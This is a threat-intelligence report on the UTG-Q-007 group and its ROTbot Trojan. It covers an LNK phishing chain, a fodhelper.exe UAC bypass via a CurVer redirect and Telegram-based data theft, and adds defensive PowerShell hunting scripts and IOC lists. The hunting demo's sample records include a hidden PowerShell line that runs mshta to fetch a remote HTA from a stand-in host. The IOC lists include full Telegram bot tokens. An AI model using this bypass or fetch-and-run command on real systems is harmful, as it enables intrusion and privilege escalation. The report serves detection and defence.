Overview
QiAnXin Threat Intelligence Center detected targeted phishing emails received by customers during routine endpoint operations. The attachment, named "版權資訊及版權保護政策 Dentsu Taipei.zip" (Copyright Information and Copyright Protection Policy, Dentsu Taipei), contained a malicious LNK file and a benign PDF lure. Tianqing EDR intercepted the script Trojan in time. Although the attackers caused no significant damage to our customers, the Chinese-language lure and the Trojan this group subsequently delivers caught our interest.
After some investigation, we named this criminal group UTG-Q-007. Its targets include Asian countries such as China, South Korea, Vietnam, and India, across the construction, real-estate marketing, and internet industries. The group uses its own ROTbot Trojan to steal sensitive data such as cryptocurrency, intellectual property, and social media accounts, and, like the faceduck Group (ducktail), monetizes hijacked Facebook business advertising accounts. We are sharing the relevant details with the open-source community so that peer companies can analyze and investigate.
Technical Details
In the attack targeting the cryptocurrency industry, the delivered PDF is as follows:
The delivered LNK metadata is as follows:
The LNK invokes forfiles.exe to launch a PowerShell command, which in turn starts mshta.exe to load a remote HTA file. The open directory listing of the C2 server is as follows:
139.99.23.XX-Tru.hta is an obfuscated VBScript whose main purpose is to launch a PowerShell script:
The script is AES-decrypted and Gzip-decompressed and then executed; the decoded content is as follows:
The attackers used a variant of the fodhelper.exe UAC bypass. To evade antivirus signatures on the usual registry path, they created a ProgID named .omg and pointed the CurVer entry of the ms-settings ProgID at it. When the auto-elevating system binary fodhelper.exe is launched, it resolves the ms-settings ProgID, reads CurVer, and is redirected to the attacker-controlled .omg ProgID, whose launch command runs the PowerShell script held in the $OMG variable. The $code content is as follows:
It downloads an archive from a remote server and runs its contents. The attackers keep updating the HTA execution chain; in the latest LNK lure, the chain is completely different from the one above. UTG-Q-007 delivers several Trojan families: NetSupport, Stealc, AsyncRAT and Rhadamanthys, most of them malware-as-a-service (MaaS) offerings. After setting aside these commodity MaaS Trojans, we found a new Trojan used by UTG-Q-007, which we named ROTbot; its PDB path contains Vietnamese.
| PDB |
|---|
| D:\ROT\ROT\Build rot Export\2024\Bot Export Chiến\14.225.210.XX-Chiến -Ver 2.0\GPT\bin\Debug\spoolsv.pdb |
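The two host-side artifacts of the delivery chain described above, the forfiles.exe -> powershell.exe -> mshta.exe process chain fetching a remote HTA and the per-user CurVer redirection of the ms-settings ProgID used for the fodhelper.exe bypass, are what an incident responder would hunt for first. The PowerShell below is an added example written for this article, not code from the report or from the malware. The process records are constructed using Sysmon Event ID 1 field names, the PIDs and the 203.0.113.10 URL are made up, and the registry check runs against the current user's hive by default (point -Root at a loaded hive to inspect another user).

```powershell
# Added example, not from the original report. Two hunting checks for the chain described above:
#  1. a process tree ending in mshta.exe loading a remote HTA, launched via forfiles.exe -> powershell.exe
#  2. a per-user CurVer redirection on the ms-settings ProgID (fodhelper.exe UAC bypass variant)

function Find-HtaDownloadChain {
    # $Events: records with ProcessId, ParentProcessId, Image, CommandLine (Sysmon Event ID 1 field names).
    param([Parameter(Mandatory)][object[]]$Events)

    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }

    foreach ($e in $Events) {
        $leaf = $e.Image -replace '^.*\\', ''          # file name only, regardless of path
        if ($leaf -ne 'mshta.exe' -or $e.CommandLine -notmatch '(?i)https?://') { continue }

        # Walk up the ancestry (bounded, in case the data has a cycle), collecting image names root -> leaf.
        $chain = @($leaf); $cur = $e; $depth = 0
        while ($depth -lt 16 -and $byPid.ContainsKey([int]$cur.ParentProcessId)) {
            $cur = $byPid[[int]$cur.ParentProcessId]
            $chain = @($cur.Image -replace '^.*\\', '') + $chain
            $depth++
        }
        $joined = $chain -join ' -> '
        if ($joined -match '(?i)forfiles\.exe -> powershell\.exe -> mshta\.exe$') {
            [pscustomobject]@{
                Pid   = $e.ProcessId
                Chain = $joined
                Url   = [regex]::Match($e.CommandLine, '(?i)https?://\S+').Value
            }
        }
    }
}

function Get-CurVerHijack {
    # HKCU\Software\Classes is merged over HKLM in HKCR, so a per-user ProgID shadows the system one.
    param(
        [string]$Root = 'HKCU:\Software\Classes',
        [string[]]$ProgIds = @('ms-settings')       # extend with other auto-elevate ProgIDs as needed
    )
    foreach ($progId in $ProgIds) {
        $curVerKey = Join-Path $Root "$progId\CurVer"
        if (-not (Test-Path $curVerKey)) { continue }   # no per-user CurVer: nothing to follow

        $target = (Get-ItemProperty -Path $curVerKey).'(default)'   # ProgID the lookup is redirected to
        if ([string]::IsNullOrWhiteSpace($target)) { continue }

        $cmdKey = Join-Path $Root "$target\shell\open\command"
        $cmd = $null; $delegate = $null
        if (Test-Path $cmdKey) {
            $props    = Get-ItemProperty -Path $cmdKey
            $cmd      = $props.'(default)'
            $delegate = $props.DelegateExecute      # an empty DelegateExecute is the classic fodhelper trick
        }
        [pscustomobject]@{
            ProgId          = $progId
            RedirectedTo    = $target
            Command         = $cmd
            DelegateExecute = $delegate
            Suspicious      = ($null -ne $cmd)      # a redirected ProgID that lands on a launch command
        }
    }
}

# Constructed Sysmon-style records (PIDs and the 203.0.113.10 URL are made up for the demo).
$sample = @(
    [pscustomobject]@{ ProcessId = 1000; ParentProcessId = 900;  Image = 'C:\Windows\explorer.exe'; CommandLine = 'explorer.exe' }
    [pscustomobject]@{ ProcessId = 1010; ParentProcessId = 1000; Image = 'C:\Windows\System32\forfiles.exe'; CommandLine = 'forfiles /p C:\Windows\System32 /m notepad.exe /c "powershell -w hidden -ep bypass -c ..."' }
    [pscustomobject]@{ ProcessId = 1020; ParentProcessId = 1010; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell -w hidden -ep bypass -c "mshta http://203.0.113.10/lure.hta"' }
    [pscustomobject]@{ ProcessId = 1030; ParentProcessId = 1020; Image = 'C:\Windows\System32\mshta.exe'; CommandLine = 'mshta http://203.0.113.10/lure.hta' }
    [pscustomobject]@{ ProcessId = 2000; ParentProcessId = 1000; Image = 'C:\Windows\System32\mshta.exe'; CommandLine = 'mshta C:\Users\u\Desktop\local.hta' }   # benign: local file, no forfiles
)

Find-HtaDownloadChain -Events $sample | Format-Table -AutoSize
Get-CurVerHijack | Format-List
```

Find-HtaDownloadChain reports only the record for PID 1030, with the chain explorer.exe -> forfiles.exe -> powershell.exe -> mshta.exe and the remote URL; the local-file mshta launch is ignored. Get-CurVerHijack returns nothing on a clean machine; on an infected one it shows ms-settings redirected to the attacker's ProgID and the command that fodhelper.exe would execute elevated.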
ROTbot first collects basic information about the victim's device (public IP, process list, username, and computer name) and checks each value against a built-in list; if any match is found, execution terminates.
Once these checks pass, it fetches the first-stage payload with a GET request to a URL hosted as a Google Cloud document.
The response is a ChildBot.txt file whose content is Base64-encoded twice. After decoding, it is as follows:
The first part is the link to the next-stage payload (another Google Cloud document); the second and third parts are concatenated into the URL used to report the device as online to a Telegram bot. ROTbot then drops SQLite.Interop.dll from its resources into the current directory.
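A decoder for a ChildBot.txt-style blob, as an added example written for this article rather than code from the report or the malware. The report states only that the file is Base64-encoded twice and splits into three parts (next-stage URL, then two values that make up the Telegram bot URL); the '|' separator, the assumption that the two values are the bot token and the chat_id, and the sample token, chat_id and URL below are all constructed for the demo.

```powershell
# Added example, not code from the report or the malware. Decodes a ChildBot.txt-style blob (Base64 applied
# twice) and rebuilds the Telegram check-in URL from its parts. The report gives only the field meanings:
# [0] next-stage URL, [1] and [2] the two values that make up the bot URL. The '|' separator, the
# token/chat_id field order and the sample values below are assumptions made for the demo.

function ConvertFrom-DoubleBase64 {
    param([Parameter(Mandatory)][string]$Blob)
    $once = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Blob.Trim()))
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($once.Trim()))
}

function ConvertFrom-ChildBotConfig {
    param(
        [Parameter(Mandatory)][string]$Blob,
        [string]$Separator = '|'                  # assumed delimiter between the three fields
    )
    $parts = (ConvertFrom-DoubleBase64 $Blob) -split [regex]::Escape($Separator)
    if ($parts.Count -lt 3) { throw "expected 3 fields, got $($parts.Count)" }
    [pscustomobject]@{
        NextStageUrl = $parts[0]
        BotToken     = $parts[1]
        ChatId       = $parts[2]
        # Telegram Bot API layout: https://api.telegram.org/bot<token>/<method>?chat_id=<id>
        CheckInUrl   = "https://api.telegram.org/bot$($parts[1])/sendMessage?chat_id=$($parts[2])"
    }
}

# Build a constructed sample exactly as the malware would have to encode it: Base64 over Base64.
$plain = 'https://example.invalid/next-stage.txt|0000000000:AAExampleTokenNotReal|-1001234567890'
$once  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($plain))
$blob  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($once))

ConvertFrom-ChildBotConfig -Blob $blob | Format-List
```

The decoded token and chat_id are the actionable IOCs from such a file: the token identifies the bot (the three bots listed later in this report were recovered this way), and the check-in URL is what to look for in proxy logs.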
The collected information is assembled into a check-in package in the following format:
This package is uploaded to the Telegram bot via the Telegram Bot API.
After check-in, the getUpdates API method is called to confirm that the package was delivered. The retrieved configuration is then written to the Setting.xml file.
Finally, the AI.dll resource is loaded into memory and its Plugin.Run method is invoked. After decrypting the configuration, the next-stage configuration file is fetched from the URLArgsMainBot field (the second Google document link).
Once decrypted, this configuration has two parts: the C2 address and the mutex name.
The current screen is captured and saved to the temp folder under a file name of 16 random characters, then uploaded to the Telegram bot via the API. Every message sent to the Telegram bot is accompanied by a fresh screenshot, with the message text attached to the image.
Persistence is applied selectively, depending on the AVDetect field.
If Kaspersky is present, no persistence is established. If AVG or Avast is present, the following message is sent to the Telegram bot:
It then steals browser data for Facebook, Instagram, YouTube, and TikTok business accounts.
The attackers aim to hijack social media advertising accounts for financial gain, an intent similar to that of the faceduck Group (ducktail). We detailed faceduck Group's activity in China in our 2023 year-end report [1], but found no evidence of overlap between UTG-Q-007 and faceduck Group.
Finally, ROTbot enters its remote-control logic, connecting back to the C2 from the second-stage configuration. The control code is derived from the open-source Quasar RAT.
Infrastructure and Victims
Based on QiAnXin Threat Intelligence Center telemetry, UTG-Q-007 hosts its HTA scripts on a large number of third-party proxy websites, most of them WordPress installs, possibly purchased as MaaS-related services:

| Proxy website | Website description |
|---|---|
| hxxps://solutionsinengineering.com/Source.hta | Australian construction company (WordPress) |
| hxxps://all-access-media.com/media/templates/site/localer-en.hta | Photography website |
| hxxps://thecreativelion.com/wp-content/uploads/2021/11/xczxcxzcxzcxzcxzc23.hta | IT company (WordPress) |
| hxxps://topmark-tuitioncentre.co.uk/wp-content/uploads/useanyfont/wp-contentplugins.hta | Educational institution (WordPress) |
| hxxps://elmejorlocal.com.co/wp-content/uploads/2018/05/cachexxx.hta | Shopping mall (WordPress) |
| hxxps://one-stopspa.com/wp-content/uploads/2019/11/lolcaljefosijfoesnofiegoiesgnos.hta | Medical beauty clinic (WordPress) |
| hxxps://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta | Food company (WordPress) |
| hxxps://alexiakombou.com/wp-content/uploads/2021/12/EN-localer.hta | Personal blog (WordPress) |
| hxxp://mw-solaris.com/solaris.hta | Blockchain gaming website |
Beyond these proxy websites, the domains registered by UTG-Q-007 follow a recognizable pattern: brand-like names such as coingecko, libreoffice and adobe recur across cheap new gTLDs (see the Domain section of the IOCs).
The C2 servers ROTbot connects back to are as follows:

| C2 |
|---|
| 14.225.210.97:12024 |
| 14.225.210.98:12024 |

These IPs belong to Vietnam Posts and Telecommunications Group (VNPT), whose VPS offerings are relatively inexpensive. In previous incidents we have seen only a few groups use VNPT VPSs, and then as proxies for their activity; using them as C2 servers is uncommon.
In 2024, ROTbot used three Telegram bots in total:

| Bot (token) | first_name | username |
|---|---|---|
| 6548823856:AAFj_qauGdRc8HWmo1ZSBQ_EtviF7hK0GKo | Debug2024149XXbot | tetris149_bot |
| 6383173017:AAH2kFOJOIXulitofO7YV1QBI8VOzzFoA-Y | Chienthan1425Bot | chiendebug14225Bot |
| 6712371927:AAF6lsf9WRb4cggeJzfTgHTreot8-jO1CTk | AKhue14225XXBot | KhueVu14225Bot |

After a brief period of monitoring, we observed a victim in Vietnam whose YouTube credentials were being stolen.
The screenshot uploaded from the victim's machine is as follows:
At the time of the theft, the victim was modeling in the SketchUp architectural software, and CrossFire (an FPS game operated by Tencent) was present on the taskbar, consistent with the gaming ecosystem of the victim's region. The version history shows that the attacker has iterated through several builds, so ROTbot activity may have started earlier than our first sighting. Although the Trojan is still in a debugging phase (two of the bot names above contain "debug"), it has shown considerable capability since early 2024. The QiAnXin Threat Intelligence Center will continue to monitor it.
Conclusion
Currently, all products based on the threat intelligence data of the QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support precise detection of such attacks.
IOC
MD5:
120c6d7e78fb92b2feada47c9d8bbab0
b86ba0844db442df61a5889b004e615b
30705266725f9bad60ea12821acf740a
8bd7eece235cee14ab700f23b7ac29db
51bad062733f1babc99254ca06db0e46
90a4af96abea4d8179c789fa3c72ddcf
82456d523f39ecb87324542c918e7dd6
6dd355c754cc7d3bcdeeeef32fdc16c9
C2:
14.225.210.97:12024
14.225.210.98:12024
HTA Payload:
hxxp://149.248.79.118/149248XX/149248XX.hta
hxxp://154.56.56.41/nilxvnq.hta
hxxp://199.34.27.196/139.99.23.XX/139.99.23.XX-Tru.hta
hxxp://199.34.27.196/139.99.23.XX/139.99.23.XX.hta
hxxp://199.34.27.196/14.225.210.98/14.225.210.XX-Khue.hta
hxxp://199.34.27.196/14.225.210.XX/14.225.210.XX-Chien.hta
hxxp://45.9.190.201/dt-excv.hta
hxxp://51.79.208.192/T/T.hta
hxxp://80.76.51.250/Downloads/start-of-proccess.lnk
hxxp://81.19.140.150/crypto.hta
hxxp://82.115.223.34/pdf/final.hta
hxxp://83.217.9.36/manual.hta
hxxp://94.156.253.211/Downloads/run-dwnl-restart.lnk
hxxp://mw-solaris.com/solaris.hta
hxxps://alexiakombou.com/wp-content/uploads/2021/12/EN-localer.hta
hxxps://all-access-media.com/media/templates/site/localer-en.hta
hxxps://coingecko.bond/lass.hta
hxxps://coingecko.bond/PuttyUac.hta
hxxps://distribution.adrdownload.software:40430/e4f0340b1/Scan004_40599.hta
hxxps://elmejorlocal.com.co/wp-content/uploads/2018/05/cachexxx.hta
hxxps://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta
hxxps://one-stopspa.com/wp-content/uploads/2019/11/lolcaljefosijfoesnofiegoiesgnos.hta
hxxps://solutionsinengineering.com/Source.hta
hxxps://thecreativelion.com/wp-content/uploads/2021/11/xczxcxzcxzcxzcxzc23.hta
hxxps://topmark-tuitioncentre.co.uk/wp-content/uploads/useanyfont/wp-contentplugins.hta
Domain:
adobe.bar
adobe.charity
coingecko.bet
coingecko.bio
coingecko.bond
coingecko.center
coingecko.cfd
coingecko.codes
coingecko.space
dwnld.fun
dwnld.online
libreoffice.best
libreoffice.bet
libreoffice.bond
libreoffice.wiki
losbandygs.org.es
mlr.lat
op-09816me.lat
plomtenburg.com
post-b09276.info
tetromask.online
tetromask.site
update.bar
updts.space
www.losbandygs.org.es
www.plomtenburg.com
www.post-b09276.info
Reference Link
[1].https://ti.qianxin.com/uploads/2024/02/02/dcc93e586f9028c68e7ab34c3326ff31.pdf